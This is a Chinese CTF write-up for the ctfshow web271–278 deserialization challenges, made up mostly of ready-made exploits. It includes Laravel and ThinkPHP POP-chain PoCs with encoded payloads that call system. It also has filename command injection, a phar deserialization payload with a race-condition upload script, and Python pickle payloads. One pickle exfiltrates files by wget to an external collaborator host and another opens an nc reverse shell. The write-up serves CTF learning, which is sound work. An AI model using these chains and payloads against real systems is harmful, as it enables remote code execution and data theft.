自学内容网 自学内容网

ctfshow-web入门-反序列化(web271-web278)

目录

1、web271

2、web272

3、web273

4、web274

5、web275

6、web276

7、web277

8、web278


 

laravel 反序列化漏洞

1、web271

laravel 5.7(CVE-2019-9081)

poc

<?php
namespace Illuminate\Foundation\Testing{
    use Illuminate\Auth\GenericUser;
    use Illuminate\Foundation\Application;
    class PendingCommand
    {
        protected $command;
        protected $parameters;
        public $test;
        protected $app;
        public function __construct(){
            $this->command="system";
            $this->parameters[]="cat /flag";
            $this->test=new GenericUser();
            $this->app=new Application();
        }
    }
}
namespace Illuminate\Foundation{
    class Application{
        protected $bindings = [];
        public function __construct(){
            $this->bindings=array(
                'Illuminate\Contracts\Console\Kernel'=>array(
                    'concrete'=>'Illuminate\Foundation\Application'
                )
            );
        }
    }
}
namespace Illuminate\Auth{
    class GenericUser
    {
        protected $attributes;
        public function __construct(){
            $this->attributes['expectedOutput']=['hello','world'];
            $this->attributes['expectedQuestions']=['hello','world'];
        }
    }
}
namespace{
 
    use Illuminate\Foundation\Testing\PendingCommand;
 
    echo urlencode(serialize(new PendingCommand()));
}
 

payload:

data=O%3A44%3A%22Illuminate%5CFoundation%5CTesting%5CPendingCommand%22%3A4%3A%7Bs%3A10%3A%22%00%2A%00command%22%3Bs%3A6%3A%22system%22%3Bs%3A13%3A%22%00%2A%00parameters%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A9%3A%22cat+%2Fflag%22%3B%7Ds%3A4%3A%22test%22%3BO%3A27%3A%22Illuminate%5CAuth%5CGenericUser%22%3A1%3A%7Bs%3A13%3A%22%00%2A%00attributes%22%3Ba%3A2%3A%7Bs%3A14%3A%22expectedOutput%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22hello%22%3Bi%3A1%3Bs%3A5%3A%22world%22%3B%7Ds%3A17%3A%22expectedQuestions%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22hello%22%3Bi%3A1%3Bs%3A5%3A%22world%22%3B%7D%7D%7Ds%3A6%3A%22%00%2A%00app%22%3BO%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00bindings%22%3Ba%3A1%3A%7Bs%3A35%3A%22Illuminate%5CContracts%5CConsole%5CKernel%22%3Ba%3A1%3A%7Bs%3A8%3A%22concrete%22%3Bs%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3B%7D%7D%7D%7D

2、web272

Laravel 5.8(CVE-2019-9081)

poc

<?php
namespace Illuminate\Broadcasting{
    use Illuminate\Bus\Dispatcher;
    use Illuminate\Foundation\Console\QueuedCommand;
    class PendingBroadcast
    {
        protected $events;
        protected $event;
        public function __construct(){
            $this->events=new Dispatcher();
            $this->event=new QueuedCommand();
        }
    }
}
namespace Illuminate\Foundation\Console{
    class QueuedCommand
    {
        public $connection="cat /flag";
    }
}
namespace Illuminate\Bus{
    class Dispatcher
    {
        protected $queueResolver="system";
 
    }
}
namespace{
 
    use Illuminate\Broadcasting\PendingBroadcast;
 
    echo urlencode(serialize(new PendingBroadcast()));
}

payload:

data=O%3A40%3A%22Illuminate%5CBroadcasting%5CPendingBroadcast%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00events%22%3BO%3A25%3A%22Illuminate%5CBus%5CDispatcher%22%3A1%3A%7Bs%3A16%3A%22%00%2A%00queueResolver%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A8%3A%22%00%2A%00event%22%3BO%3A43%3A%22Illuminate%5CFoundation%5CConsole%5CQueuedCommand%22%3A1%3A%7Bs%3A10%3A%22connection%22%3Bs%3A9%3A%22cat+%2Fflag%22%3B%7D%7D

3、web273

Laravel 5.8(CVE-2019-9081)

web272 的 payload:

data=O%3A40%3A%22Illuminate%5CBroadcasting%5CPendingBroadcast%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00events%22%3BO%3A25%3A%22Illuminate%5CBus%5CDispatcher%22%3A1%3A%7Bs%3A16%3A%22%00%2A%00queueResolver%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A8%3A%22%00%2A%00event%22%3BO%3A43%3A%22Illuminate%5CFoundation%5CConsole%5CQueuedCommand%22%3A1%3A%7Bs%3A10%3A%22connection%22%3Bs%3A9%3A%22cat+%2Fflag%22%3B%7D%7D

4、web274

ThinkPHP V5.1

exp

<?php
namespace think;

abstract class Model{
    protected $append = [];
    private $data = [];
    public function __construct()
    {
        $this->append = ["li"=>[]];
        $this->data = ["li"=>new Request()];
    }
}
namespace think\process\pipes;
use think\model\Pivot;
class Windows{
    private $files = [];
    public function __construct()
    {
        $this->files = [new Pivot()];
    }
}
namespace think\model;
use think\model;
class Pivot extends Model{

}
namespace think;
class Request{
    protected $hook = [];
    protected $filter;
    protected $config;
    protected $param = [];
    public function __construct()
    {
        $this->hook = ["visible"=>[$this,"isAjax"]];
        $this->filter = 'system';
        $this->config = ["var_ajax"=>''];
        $this->param = ['cat /f*'];
    }
}
use think\process\pipes\Windows;
echo base64_encode(serialize(new Windows()));
?>

payload:

?data=TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Mjp7czo5OiIAKgBhcHBlbmQiO2E6MTp7czoyOiJsaSI7YTowOnt9fXM6MTc6IgB0aGlua1xNb2RlbABkYXRhIjthOjE6e3M6MjoibGkiO086MTM6InRoaW5rXFJlcXVlc3QiOjQ6e3M6NzoiACoAaG9vayI7YToxOntzOjc6InZpc2libGUiO2E6Mjp7aTowO3I6NztpOjE7czo2OiJpc0FqYXgiO319czo5OiIAKgBmaWx0ZXIiO3M6Njoic3lzdGVtIjtzOjk6IgAqAGNvbmZpZyI7YToxOntzOjg6InZhcl9hamF4IjtzOjA6IiI7fXM6ODoiACoAcGFyYW0iO2E6MTp7aTowO3M6NzoiY2F0IC9mKiI7fX19fX19

5、web275

system('rm '.$this->filename);

 filename 可控,使用分号截断实现命令执行

?fn=1.php;ls;

读取 flag.php

?fn=1.php;tac flag.php;

拿到 flag:ctfshow{28fb8db5-7e60-4876-9079-f4e64554eb77}

6、web276

新增对 admin 的判断

public $admin = false; admin 默认是 false ,我们需要修改它为 true 才会进入 system。

但是这里无法直接修改,我们可以采用 phar 文件来触发,当读取 phar 文件时,会自动反序列化   manifest 中的字符串,采用 phar 协议来读取即可。

生成 phar 文件:

<?php
class filter{
    public $filename = "1.php;tac f*;";
    public $filecontent;
    public $evilfile = true;
    public $admin = true;
}
$o = new filter();

$phar = new Phar("my.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($o);
$phar->addFromString("my.txt", "my");
$phar->stopBuffering();
?>

这里还需要结合条件竞争,因为我们写入的这个 phar 文件会被删除,我们需要在它还没有被删除前访问到它,触发反序列化。 

exp:

import threading
import requests

url = "http://882d7c83-d5eb-4fec-abd6-3eca2abc1283.challenge.ctf.show/"
content = open("my.phar", "rb").read()
found_flag = False

def upload():
    requests.post(url=url + "?fn=my.phar", data=content)

def read():
    global found_flag
    response = requests.post(url=url + "?fn=phar://my.phar/", data="1")
    if "ctfshow{" in response.text or "flag{" in response.text:
        print(response.text)
        found_flag = True

while not found_flag:
    threading.Thread(target=upload).start()
    threading.Thread(target=read).start()

拿到 flag:ctfshow{99e96faa-80bf-4ba6-b915-dfbdccf5067a}

7、web277

python 反序列化

import os
import pickle
import base64

class RCE(object):
    def __reduce__(self):
        return (os.popen, ('wget il7p6a9q8k2lxm0uh96ux3uif9l09rxg.oastify.com?1=`cat f*`',))

print(base64.b64encode(pickle.dumps(RCE())))

结合 bp 的 Collaborator 模块外带

payload:

backdoor?data=gASVUwAAAAAAAACMAm9zlIwFcG9wZW6Uk5SMPHdnZXQgaWw3cDZhOXE4azJseG0wdWg5NnV4M3VpZjlsMDlyeGcub2FzdGlmeS5jb20/MT1gY2F0IGYqYJSFlFKULg==

 

拿到 flag:ctfshow{2d4f0ae3-dc87-4c9d-b054-9e563bc3886a} 

也可以反弹 shell

import pickle
import base64

class cmd():
    def __reduce__(self):
        return (eval,("__import__('os').popen('nc ip port -e /bin/sh').read()",))

c = cmd()
c = pickle.dumps(c)
print(base64.b64encode(c))

8、web278

过滤了 os.system,方法同上


原文地址:https://blog.csdn.net/Myon5/article/details/143657655

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!